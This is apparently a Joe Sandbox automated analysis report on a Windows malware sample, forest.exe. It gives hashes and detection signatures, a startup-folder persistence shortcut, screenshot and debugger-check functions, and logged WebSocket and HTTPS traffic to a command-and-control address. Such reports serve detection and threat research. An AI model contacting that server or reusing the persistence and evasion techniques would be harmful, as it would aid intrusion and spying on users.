Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
forest.exe

Overview

General Information

Sample name:forest.exe
Analysis ID:1513254
MD5:5242f809563eb3764684ef1180adb902
SHA1:491399cc669f92229d4a0c4a418067c5d4a808e8
SHA256:2a3519501362a44a4b122fbf869e195989741525883f07d0fc2d2e5e48fb7fff
Tags:exelibraofficeonline-com
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • forest.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\forest.exe" MD5: 5242F809563EB3764684EF1180ADB902)
  • forest.exe (PID: 7876 cmdline: "C:\Users\user\Desktop\forest.exe" MD5: 5242F809563EB3764684EF1180ADB902)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 45.66.249.249, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\forest.exe, Initiated: true, ProcessId: 7660, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49709
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\forest.exe, ProcessId: 7660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSVC.lnk
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: forest.exeAvira: detected
Source: forest.exeReversingLabs: Detection: 52%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.2% probability
Source: forest.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\User\Documents\root\Migratory\Projects\Current\Testing\x64\Release\ClientTest.pdb? source: forest.exe
Source: Binary string: C:\Users\User\Documents\root\Migratory\Projects\Current\Testing\x64\Release\ClientTest.pdb source: forest.exe
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF9C80 GetFullPathNameW,GetFullPathNameW,FindFirstFileExW,GetLastError,FindClose,0_2_00007FF75BCF9C80
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD670D8 FindFirstFileExW,0_2_00007FF75BD670D8
Source: global trafficTCP traffic: 192.168.2.3:49709 -> 45.66.249.249:8080
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.249
Source: global trafficHTTP traffic detected: GET /sock HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: Where are my socks?Sec-WebSocket-Key: bT3JIGuy/H0GfqD3c9Y3nQ==Sec-WebSocket-Version: 13Host: 45.66.249.249:8080
Source: global trafficHTTP traffic detected: GET /sock HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: Where are my socks?Sec-WebSocket-Key: 55di3B2o1V59q09T/ftUXg==Sec-WebSocket-Version: 13Host: 45.66.249.249:8080
Source: forest.exe, 00000000.00000002.2610006693.0000017E8239C000.00000004.00000020.00020000.00000000.sdmp, forest.exe, 00000002.00000002.2609978471.0000023D85917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: forest.exe, 00000000.00000002.2610006693.0000017E8231D000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: forest.exe, 00000002.00000002.2609978471.0000023D858E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab&3
Source: forest.exe, 00000000.00000002.2610006693.0000017E8239C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab4W
Source: forest.exe, 00000002.00000002.2609978471.0000023D858E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.66.249.249:8443/
Source: forest.exe, 00000002.00000002.2609978471.0000023D85936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.66.249.249:8443/bc
Source: forest.exe, 00000000.00000002.2610006693.0000017E8239C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.66.249.249:8443/bc-2476756634-1003
Source: forest.exe, 00000000.00000002.2610006693.0000017E8231D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.66.249.249:8443/o
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFE9E0 GdiplusStartup,GetDesktopWindow,GetDC,CreateCompatibleDC,GetDesktopWindow,GetClientRect,CreateCompatibleBitmap,SelectObject,BitBlt,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,SelectObject,DeleteObject,DeleteObject,GetDesktopWindow,ReleaseDC,GdiplusShutdown,GdipGetImageEncoders,SelectObject,DeleteObject,DeleteObject,GetDesktopWindow,ReleaseDC,GdiplusShutdown,CreateStreamOnHGlobal,GdipSaveImageToStream,SelectObject,DeleteObject,DeleteObject,GetDesktopWindow,ReleaseDC,GdiplusShutdown,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75BCFE9E0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD07B000_2_00007FF75BD07B00
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF50400_2_00007FF75BCF5040
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF5EF00_2_00007FF75BCF5EF0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF46D00_2_00007FF75BCF46D0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFFD100_2_00007FF75BCFFD10
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD4FCD00_2_00007FF75BD4FCD0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD68C740_2_00007FF75BD68C74
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD40C500_2_00007FF75BD40C50
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD02BD00_2_00007FF75BD02BD0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFAB7F0_2_00007FF75BCFAB7F
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFAB270_2_00007FF75BCFAB27
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFAB530_2_00007FF75BCFAB53
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD59B000_2_00007FF75BD59B00
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFAAFB0_2_00007FF75BCFAAFB
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD03AB00_2_00007FF75BD03AB0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFAACF0_2_00007FF75BCFAACF
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD56AB40_2_00007FF75BD56AB4
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD27A440_2_00007FF75BD27A44
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFAA430_2_00007FF75BCFAA43
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFE9E00_2_00007FF75BCFE9E0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD609D80_2_00007FF75BD609D8
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD4D9E40_2_00007FF75BD4D9E4
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD009A00_2_00007FF75BD009A0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD589D00_2_00007FF75BD589D0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF69C00_2_00007FF75BCF69C0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF59600_2_00007FF75BCF5960
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD049400_2_00007FF75BD04940
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD2C0D80_2_00007FF75BD2C0D8
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD670D80_2_00007FF75BD670D8
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFA1100_2_00007FF75BCFA110
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD430F00_2_00007FF75BD430F0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD350AC0_2_00007FF75BD350AC
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD610580_2_00007FF75BD61058
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD0B0400_2_00007FF75BD0B040
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD280180_2_00007FF75BD28018
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD58F340_2_00007FF75BD58F34
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD29F300_2_00007FF75BD29F30
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD30EF00_2_00007FF75BD30EF0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD35EC40_2_00007FF75BD35EC4
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD41E600_2_00007FF75BD41E60
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD62DB80_2_00007FF75BD62DB8
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD63D400_2_00007FF75BD63D40
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD20D540_2_00007FF75BD20D54
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD27D1C0_2_00007FF75BD27D1C
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD4F4A00_2_00007FF75BD4F4A0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD3947C0_2_00007FF75BD3947C
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD3E4480_2_00007FF75BD3E448
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD344040_2_00007FF75BD34404
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD153700_2_00007FF75BD15370
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCFC3000_2_00007FF75BCFC300
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD4F2B80_2_00007FF75BD4F2B8
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD5B2C00_2_00007FF75BD5B2C0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD662840_2_00007FF75BD66284
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF72600_2_00007FF75BCF7260
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD222700_2_00007FF75BD22270
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD602240_2_00007FF75BD60224
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD322300_2_00007FF75BD32230
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD501E40_2_00007FF75BD501E4
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF92000_2_00007FF75BCF9200
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD161C00_2_00007FF75BD161C0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD4C1780_2_00007FF75BD4C178
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD5C1880_2_00007FF75BD5C188
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD6A1700_2_00007FF75BD6A170
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD287FC0_2_00007FF75BD287FC
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD368040_2_00007FF75BD36804
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD6C7E80_2_00007FF75BD6C7E8
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD6B7BC0_2_00007FF75BD6B7BC
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD057800_2_00007FF75BD05780
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD3869C0_2_00007FF75BD3869C
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD4F6880_2_00007FF75BD4F688
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD3D68C0_2_00007FF75BD3D68C
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD2B6640_2_00007FF75BD2B664
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD4262C0_2_00007FF75BD4262C
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD565BC0_2_00007FF75BD565BC
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD3C59C0_2_00007FF75BD3C59C
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD605280_2_00007FF75BD60528
Source: C:\Users\user\Desktop\forest.exeCode function: String function: 00007FF75BD0A750 appears 35 times
Source: C:\Users\user\Desktop\forest.exeCode function: String function: 00007FF75BD0F390 appears 54 times
Source: forest.exeBinary or memory string: OriginalFilename vs forest.exe
Source: forest.exe, 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewmflJ vs forest.exe
Source: forest.exe, 00000002.00000002.2610645465.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewmflJ vs forest.exe
Source: forest.exeBinary or memory string: OriginalFilenamewmflJ vs forest.exe
Source: classification engineClassification label: mal60.winEXE@2/3@0/1
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD009A0 CreateToolhelp32Snapshot,Process32FirstW,WideCharToMultiByte,WideCharToMultiByte,Process32NextW,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75BD009A0
Source: C:\Users\user\Desktop\forest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSVC.lnkJump to behavior
Source: forest.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\forest.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\forest.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: forest.exeReversingLabs: Detection: 52%
Source: unknownProcess created: C:\Users\user\Desktop\forest.exe "C:\Users\user\Desktop\forest.exe"
Source: unknownProcess created: C:\Users\user\Desktop\forest.exe "C:\Users\user\Desktop\forest.exe"
Source: C:\Users\user\Desktop\forest.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: websocket.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: websocket.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\forest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: WindowsSVC.lnk.0.drLNK file: ..\..\..\..\..\..\..\Desktop\forest.exe
Source: forest.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: forest.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: forest.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: forest.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: forest.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: forest.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: forest.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: forest.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: forest.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\User\Documents\root\Migratory\Projects\Current\Testing\x64\Release\ClientTest.pdb? source: forest.exe
Source: Binary string: C:\Users\User\Documents\root\Migratory\Projects\Current\Testing\x64\Release\ClientTest.pdb source: forest.exe
Source: forest.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: forest.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: forest.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: forest.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: forest.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: forest.exeStatic PE information: real checksum: 0xacdd8 should be: 0xae09f
Source: forest.exeStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\forest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSVC.lnkJump to behavior
Source: C:\Users\user\Desktop\forest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSVC.lnkJump to behavior
Source: C:\Users\user\Desktop\forest.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\forest.exeCode function: _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetNetworkParams,GlobalAlloc,GetNetworkParams,GetAdaptersInfo,GlobalAlloc,GetAdaptersInfo,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,